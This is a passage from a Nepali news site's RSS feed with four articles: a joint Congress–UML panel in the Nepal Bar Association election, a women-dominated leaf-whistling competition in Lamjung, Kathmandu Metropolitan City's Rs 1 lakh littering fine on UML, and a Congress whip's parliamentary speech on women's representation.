]]>https://www.antaranganews.com/?feed=rss2&p=370450नेपाल बारको चुनाव : सत्तारुढ दुई दल निकटले बनाए मिश्रित प्यानल
https://www.antaranganews.com/?p=30397
https://www.antaranganews.com/?p=30397#respondThu, 06 Mar 2025 13:12:44 +0000https://www.antaranganews.com/?p=30397काठमाडौं– नेपाल बार एशोसिएसनको २७ औं केन्द्रीय कार्यसमितिका लागि आउँदो चैत २३ गते निर्वाचन हुँदैछ । सो निर्वाचनका लागि नेपाली काँग्रेस र एमाले निकट कानुनव्यवसायीले संयुक्त प्यानल बनाएको फागुन २२ गते खुलासा भएको हो । उम्मेदवार मनोनयन दर्ता आज फागुन २२ गते भएको हो ।
नेपाली काँग्रेसले २०८४ मा एक्लै चुनाव लड्ने उदघोष गरिरहेको बेलामा भातृसंस्थाहरूमा भने काँग्रेस– एमालेका बीचमा अहिलेदेखिनै तालमेलको अभ्यास गराइएको रुपमा हेरिएको छ । यसअघि केही साता अघि सम्पन्न पत्रकार महासंघको निर्वाचनमा पनि काँग्रेस– एमालेका बीचमा तालमेल गराइएको थियो । जसलाई २०८४ को पूर्वाभ्यासका रुपमा लिएको टिप्पणी समेत भएको थियो । त्यसलाई थप पुष्टि गर्ने गरी यतिबेला बारको निर्वाचनमा पनि काँग्रेस– एमालेका बीचमा संयुक्त प्यानल निर्माण गरी चुनावी मैदानमा जाने उदघोष गरिएको छ ।
कांग्रेसको शुभेच्छुक संस्था डीएलए र नेकपा एमाले निकट पीपीएलएबाट चुनावी तालमेल गर्ने गरी उम्मेदवारी दर्ता गरेका छन् कांग्रेस निकट डिएलएबाट अध्यक्षमा विजय मिश्रले उम्मेदवारी दिनु भएको छ । सोही प्यानलमा एमाले पक्षधर पीपीएलएबाट महासचिवमा केदार कोइरालाले उम्मेदवारी दर्ता गराउनु भएको छ । सत्ता पक्षमा रहेका दलबाट तालमेल भएको डीएलएका पूर्वअध्यक्ष योगेन्द्रबहादुर अधिकारीले बताउनु भयो ।
सत्ताधारी दल मिलेर चुनाव लड्ने तानाबाना बुनेपछि सो चुनावका लागि नेकपा(माओवादी केन्द्र) र राष्ट्रिय स्वतन्त्र पार्टी(रास्वपा) बीच तालमेल हुने भएको छ । विपक्षी दल निकट कानुन व्यवसायीहरूको संगठनले गरेको चुनावी तालमेलमा राप्रपा पक्षधरलाई पनि समेट्ने भएको छ ।
माओवादी निकट कानुन व्यवसायीहरूको संगठन आरपीएलबाट रमण श्रेष्ठ अध्यक्ष र रास्वपा पक्षधर स्वतन्त्र कानुन व्यवसायी मञ्चबाट महासचिवमा यज्ञमणि न्यौपानेले उम्मेदवारी दर्ता गराउनु भएको छ । श्रेष्ठको उम्मेवारीमा प्रस्तावक वरिष्ठ अधिवक्ता शम्भु थापा र समर्थकमा वरिष्ठ अधिवक्ता सुशिलकुमार पन्त बन्नु भएको छ ।
नेपाली कांग्रेसको शुभेच्छुक संस्था डीएलए र नेकपा एमालेको पक्षको पीपीएलले बारको चुनावमा तालमेल गर्ने भएपछि विपक्षी दलहरू निकटका कानुन व्यवसायीले छुट्टै प्यानल खडा गरेको बताएका छन् । महासचिवमा उम्मेदवारी दिनु भएका न्यौपाने विपक्ष दल निकटका कानुन व्यवसायीले छुट्टै प्यानल बनाएको जानकारी दिनु भयो ।
]]>https://www.antaranganews.com/?feed=rss2&p=303970दोस्रो पात बजाउने खुला प्रतियोगितामा खप्पीस महिलाहरूले देखाए कला
https://www.antaranganews.com/?p=30320
https://www.antaranganews.com/?p=30320#respondMon, 03 Mar 2025 04:31:46 +0000https://www.antaranganews.com/?p=30320तान्द्राङटक्सार(लमजुङ) । नेपालको लोपोन्मुख संस्कृतिका रुपमा रहेको पात बजाउने कलामा महिला खप्पीस देखिएका छन् । यहाँ आयोजना गरिएको पात बजाउने दोस्रो खुला प्रतियोगितामा पहिलो, दोस्रो र सान्त्वना स्थान महिलाले हासिल गरेसँगै हालै त्यस्तो पुष्टि भएको हो ।
लोक संस्कृति एवम् लोक साहित्यिक पर्यटन मितेरी पदयात्रामा ठाडोभाका लोककला प्रतिष्ठान नेपालको निमन्त्रणमा सहकार्यका लागि नेपाली संस्कृति सुरक्षा परिषद, आसाम भारतबाट यहाँ आएको टोलीलाई नेपाली संस्कृतिको लोपोन्मुख विधा पात बजाउने देखाएर यसको संरक्षण र प्रवद्र्धनमा टेवा पुर्याउने उद्देश्यका साथ सो प्रतियोगिता गरिएको हो ।
परिषदमा आवद्ध संस्कृतिकर्मीहरू नेपालमा नेपाली संस्कृतिको अध्ययन अवलोकनका क्रममा लमजुङ आएको मौकामा पछिल्ला वर्षमा यसै जिल्लामा पनि बिर्सिन थालिएको पात बजाउने कलाको संरक्षण गर्न प्रतियोगिताको आयोजना गरिएको हो । आसामबाट आएको त्यो टोलीलाई यो मौलिक संस्कृतिका बारेमा जानकारी गराउने उद्देश्यले सो प्रतियोगिता गरिएको आयोजक ठाडोभाका लोककला प्रतिष्ठान नेपालका संरक्षक एवम् ठाडोभाका महानायक बुद्धिमान दुरा ‘धम्पु’ले बताउनु भयो ।
नेपाली संस्कृति सुरक्षा परिषद, आसामका महासचिव वीरेन्द्र राणाले यो कला आफ्नो जीवनमा पहिलो पटक देखेको बताउनु भयो । उहाँका अनुसार बाजा बिना पनि दुरुस्त गीतको लबज निकाल्न सक्ने कला देखेर हामी त सबै छक्क प¥यौं । उनले भने, ‘यो परम्परा बचाउनका लागि प्रतियोगिता समेत राखेर हामीलाई मनोरञ्जन दिने काम गर्ने आयोजकहरूको भएको छ यो कार्य प्रशंसनीय छ ।’ यस कलालाई बचाउनु पर्छ, फर्केपछि आसाममा पनि हामी यसलाई जगाउन प्रयास गर्नेछौ. राणाले भन्नुभयो ।
यसैगरी, सोही परिषदको भगिनी संस्था आमा मञ्चका अध्यक्ष डा. देवकीदेवी तिमसिनाले यो सीपका बारेमा हामीले कहिल्यै नजानेको, नसुनेको देख्दा त सबै अचम्ममा परियो भन्नुभयो । उहाँका अनसार पिपिरी पातैले भन्ने त सुनेको तर वन पाखा नै गुञ्जिने गरी गाएको, त्यो पनि महिला दिदी बहिनीहरू उत्साहजन सहभागिता र भाका पनि उस्तै मिठो सुन्न पायौं त्यसले हामीलाई समेत उत्प्रेरित गरेको छ । उहाँले भन्नुभयो, ‘हामी लोक संस्कृतिका कति धनी छौं भन्ने यो ज्वलन्त नमूना हो, यता पनि केही गर्न सकिन्छ कि ? हामी सल्लाह गर्ने सोचमा छौं ।’
सो प्रतियोगितामा दोर्दी गाउँपालिका– ८ दुवारकी सुकमाया मिजार पहिलो, मध्यनेपाल नगरपालिका– २ तान्द्राङटक्सारकी देवी गिरी दोस्रो भएको निर्णायक समितिका संयोजक देवराज गुरुङले बताउनु भयो । उहाँका अनुसार सो प्रतियोगितामा १७ जनाले भाग लिएका थिए । तीमध्ये तेस्रो स्थान मध्यनेपाल नगरपालिका– १ का जिता सन्तोष भुजेलले हासिल गर्नु भयो । त्यस्तै, सान्त्वनातर्फ मध्यनेपाल नगरपालिका– २ तान्द्राङटक्सारकी पार्वती नेपाली र सोही वडाको तान्द्राङटक्सारका मधुकर गिरीले जित्न सफल भएको निर्णायक समितिका सदस्य आशबहादुर विकले जानकारी दिनुभयो ।
उहाँका अनुसार पहिलो हुनेलाई सात हजार रुपैयाँ, दोस्रोलाई पाँच हजार रुपैयाँ, तेस्रोलाई तीन हजार रुपैयाँ र सान्त्वना स्थान हासिल गर्ने दुई जनालाई जनही २÷२ हजार रुपैयाँ पुरस्कार र प्रमाणपत्र प्रदान गरिएको थियो ।
विजयीहरूलाई गण्डकी प्रदेशका वन तथा वातावरण मन्त्री भेषबहादुर पौडेल, सांसद टिका बस्याल, नेपाली संस्कृति सुरक्षा परिषद, आसामका अध्यक्ष एलवि प्रधानले संयुक्त रुपमा पुरस्कार र प्रमाणपत्र वितरण गर्नु भएको थियो ।
ठाडोभाका लोककला प्रतिष्ठान नेपालले आफ्नो नवौं स्थापना दिवसदेखि पात बजाउने प्रतियोगिताको आयोजना गर्न थालेको हो । यसपटक आसामबाट नेपाल आएका नेपाली भाषीका लागि लोपोन्मुख संस्कृतिको स्वाद चखाउन प्रतियोगिताको आयोजना गरेको प्रतिष्ठानका अध्यक्ष नवराज पहाडीले जानकारी दिनुभयो ।
]]>https://www.antaranganews.com/?feed=rss2&p=303200एमालेलाई महानगरको सडक फोहोर गरेकोमा मात्र १ लाख जरिवाना
https://www.antaranganews.com/?p=28282
https://www.antaranganews.com/?p=28282#respondSat, 23 Nov 2024 08:39:00 +0000https://www.antaranganews.com/?p=28282काठमाडौं– सत्ता रुढ नेकपा एमालेले गरेको शक्ति प्रदर्शनका क्रममा सडक फोहर गरेको भन्दै सो दललाई काठमाडौं महानगरपालिकाले एक लाख रुपैयाँ मात्र जरिवाना तिराउने भएको छ । दरबारमार्गमा जागरण सभाका क्रममा सडक तथा सडक पेटीमा जथाभावी फोहोर गरेको जनाउँदै महानगरपालिकाले एक लाख रुपैयाँ जरिवाना गरिएको व्यहोराको पत्र मंसिर ७ गते पठाएको हो ।
काठमाडौं महानगरपालिकाले आफ्नो आर्थिक ऐन २०८१, तथा फोहोर मैला व्यवस्थापन ऐन २०६८ आकर्षित भएको जनाउँदै एक लाख रुपैयाँ जरिवाना गरिएको पत्रमा भनिएको छ ।
अब महानगरपालिकालाई एमालेले जरिवाना रकम तिर्नुपर्ने नगर प्रहरी निरीक्षक लिलाराज गाछाले हस्ताक्षर गरी पठाएको पत्रमा उल्लेख गरिएको छ ।
महानगरले त्यस्तो कारवाहीबाट २ करोड ५० लाख संकलन गर्ने वार्षिक लक्ष्य राखेको छ । काठमाडौं महानगरपालिले चालु आर्थिक वर्षको आर्थिक ऐनको अनुसूची १६ मा २० वटा बुँदामा दण्ड–जरिवानाको प्रवन्ध उल्लेख छ ।
महानगरले आफ्नै कार्यालय भवनमा सञ्चालित नारायणी चमेना गृहलाई पनि दुई लाख रुपैयाँ जरिवाना गरेको थियो । महानगरको त्यस्तो कारवाहीको शृंखला :
त्यसो त महानगरले फोहर गर्नेलाई जरिवाना गरेको यो पहिलो पटक होइन । त्यसको लामो शृंखला नै तयार भइसकेको छ । गत असार २८ गते कलंकीमा रहेको बर्गर हाउस एन्ड क्रन्ची फ्राइड चिकेनलाई दुई लाख रुपैयाँ जरिवाना गरेको थियो । यसैगरी, महानगरले अनलाइन मःम अर्डर गर्ने ग्राहकलाई गन्धयुक्त अस्वस्थ्यकर अचार पठाएको पुष्टि भएपछि ‘बजार व्यवस्थापन तथा अनुगमन ऐन’ बमोजिम कारबाही गरिएको जनाएको छ ।
चालु आव सुरु भएपछि महानगरले गत साउन २७ गते महानगरले अनामनगरमा रहेको किम्ची रेस्टुरेन्ट एन्ड फास्ट फुडलाई दुई लाख जरिवाना गरेको थियो । सिलभित्र रहेको खानेपानीमा किरा देखिएपछि सो कम्पनीलाई कारबाही गरिएको महानगरले जनाएको थियो ।
त्यस्तै, साउन ३० गते ‘अक्वा त्रिदेव’ ब्रान्डबाट उत्पादित जारको पानीमा कोलिफर्म भेटिएपछि महानगरले दुई लाख जरिवाना गर्ने निर्णय महानगरले गरेको थियो । त्यो काठमाडौं जिल्लाकै तारकेश्वर नगरपालिका– १० मा सञ्चालित जाम्बुलिङ्गा ग्रुप इन्डस्ट्रीले उत्पादन गरेको पानी हो ।
यसैगरी, भदौ १२ गते श्रीकेश तेल उत्पादक कम्पनी सप्तऋषि आयल एन्ड कस्मेटिक इन्डस्ट्रीलाई पनि दुई लाख रुपैयाँ काठमाडौं महानगरले जरिवाना तिराएको थियो । महानगरले सो कम्पनीले तेलमा प्रयोग हुने कच्चापदार्थको प्राविधिक सम्मिश्रणको विधि (फर्मुलेसन, रेसिपि मेथड) उल्लेख गरिएको कागजात प्राप्त हुन नसकेको र कारखानामा स्ट्यान्डर्ड अपरेसन प्रोसिडियोर (एसओपी) को अभिलेख नपाइएपछि कारबाही गरेको हो ।
कार्तिक १ गते बुद्धमाई अस्पताल टेकुलाई फोहोर व्यवस्थापनमा लापरबाही गरेकोमा महानगरले एक लाख रुपैयाँ जरिवाना गरेको थियो । चौथो पटक अनुगमन गर्दा पनि अवस्थामा सुधार नभएको र सुधार गर्ने प्रयास पनि नभएको देखिएपछि जरिवाना तिराएको महानगरले जनाएको छ ।
महानगरले यही मंसिर ५ गते सुकेधाराको होटल मेक्योरलाई ५० हजार रुपैयाँ जरिवाना गरेको थियो । होटलले बाटोमा फोहोर फालेको भन्दै जरिवाना तिराएको हो । सोही लाइनमा मंसिर ७ गते एमाले पनि फेला परेको हो ।
महानगरले चालु आर्थिक वर्ष २०८१÷८२ को पहिलो चौमासिक अवधि अर्थात कार्तिक मसान्तसम्म ९० लाख ६७ हजार रुपैयाँ प्रशासनिक दण्ड– जरिवानाबाट उठाएको जनाएको छ । सो रकम वार्षिक लक्ष्यको तुलनामा ३६.२७ प्रतिशत प्रगति हो ।
]]>https://www.antaranganews.com/?feed=rss2&p=282820कांग्रेसका सचेतक सुशीलाले उठाएको विषयमा रास्वपाका सांसदद्वारा टेबुल ठोकेर समर्थन
https://www.antaranganews.com/?p=25696
https://www.antaranganews.com/?p=25696#respondWed, 24 Jul 2024 02:28:04 +0000https://www.antaranganews.com/?p=25696काठमाडौं– नेपाली कांग्रेसका सचेतक सुशीला थिङले उठाएको विषयमा राष्ट्रिय स्वतन्त्र पार्टी (रास्वपा)का सांसदहरूले टेबुल ठोकेर स्वागत एवम् समर्थन गरेका छन् । संसद बैठकमा नेपाली कांग्रेसकी सचेतक समेत रहनु भएकी थिङले महिला प्रतिनिधित्वको विषय उठाउँदा रास्वपा सांसदहरूले टेबुल ठोकेर साउन ८ गते समर्थन गरेका हुन् ।
प्रतिनिधिसभा बैठकमा थिङले मन्त्रिपरिषद् निर्माण गर्दा संविधान कुल्चिनेक्रम जारी रहेको विषय उठाउँदै भन्नु भएको थियो, ‘मैले पढेको मनुस्मृतिमा यत्र नस्र्यस्य पुज्यन्ते रमन्ते तत्र देवता भन्ने थियो । यहाँ त यत्र पुरस्य पुज्यन्ते रमन्ते तत्र देवता जस्तो भयो, यो किन मैले भनिरहेको छु भने जुनसुकै मन्त्रिमण्डलमा पनि संविधानलाई कुल्चिएर ३३ प्रतिशत महिला मन्त्रिपरिषद्मा कहिले पनि देख्न नपाउने भयो । सायद पुरुषहरू नै प्रमुखमा भएर होला महिलाहरू मन्त्रीमा सिफारिस भएनन् ।’
थिङले आफ्नो भनाई राख्न नभ्याउँदै संसद्मा रास्वपाका अधिकांश सांसदले टेबुल ठोकेर समर्थन गरिरहेको दृश्य निकै रोचक थियो । त्योसँगसँगै महिला सांसदहरूले पनि थिङले उठाएको विषयमा समर्थन गरेका थिए ।
सचेतक थिङले अन्य क्षेत्रमा योग्य हुने महिला प्रतिनिधित्वमा किन समानुपातिकमा मात्र पर्छन् भन्दै प्रश्न उठाउनु भएको थियो । उहाँले भन्नुभयो, ‘मेरो उदाहरण प्रतिनिधिमुलक पात्रमा मात्र हो । मैले कानुनमा स्नातक गरेको छु, सोसियोलोजीमा स्नातकोत्तर गरेको छु । तर, म कहिल्यै योग्य भइन । मैले समानुपातिक कोटाबाट त यो उपाधि पाएको थिइन, त्यसकारण हामी महिलाहरू कहिलेसम्म यो समानुपातिकको दर्जामा दर्ज हुने हो, हामीलाई कहिलेसम्म समान बनाउने हो ?’
यसरी महिलाको सहभागीलाई सरकारले न्यून बनाएको भन्दै प्रश्न गरेपछि राष्ट्रिय स्वतन्त्र पार्टी (रास्वपा)सहित प्रतिपक्षी दलका नेताहरूले टेबल ठोकेर समर्थन जनाएका थिए ।
]]>https://www.antaranganews.com/?feed=rss2&p=256960